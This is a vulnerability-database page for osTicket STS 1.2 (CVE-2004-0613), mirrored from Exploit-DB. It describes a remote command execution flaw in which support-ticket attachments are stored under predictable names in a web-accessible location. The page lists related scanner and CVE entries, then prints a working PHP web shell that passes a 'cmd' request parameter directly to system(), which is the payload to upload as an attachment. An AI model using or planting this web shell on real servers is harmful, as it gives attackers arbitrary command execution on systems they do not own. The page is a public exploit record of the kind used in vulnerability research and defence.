Lucene search
+L

osTicket STS 1.2 - Attachment Remote Command Execution

🗓️ 21 Jun 2004 00:00:00Reported by Guy PearceType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 50 Views

osTicket STS 1.2 has a vulnerability allowing remote command execution via predictable attachment names.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2004-0613
30 Jun 200404:00
cve
cvelist
Cvelist
CVE-2004-0613
30 Jun 200404:00
cvelist
euvd
EUVD
EUVD-2004-0612
7 Oct 202500:30
euvd
nvd
NVD
CVE-2004-0613
6 Dec 200405:00
nvd
openvas
OpenVAS
osTicket < 1.2.7 Attachment Code Execution Vulnerability - Active Check
3 Nov 200500:00
openvas
openvas
OpenVAS
osTicket < 1.2.7 Attachment Viewing Vulnerability
3 Nov 200500:00
openvas
openvas
OpenVAS
osTicket Attachment Viewing Vulnerability
3 Nov 200500:00
openvas
nessus
Tenable Nessus
osTicket Attachment Handling File Upload Arbitrary Code Execution
14 Jul 200400:00
nessus
nessus
Tenable Nessus
osTicket Arbitrary Attachment Disclosure
14 Jul 200400:00
nessus
source: https://www.securityfocus.com/bid/10586/info

osTicket is reported prone to a remote command execution vulnerability. The issue is reported to present itself because attachments submitted as a part of a support ticket request are stored with a predictable name in a known web accessible location.

<?PHP
echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
if (!$cmd)die;
system($cmd);
?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jan 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.09869
50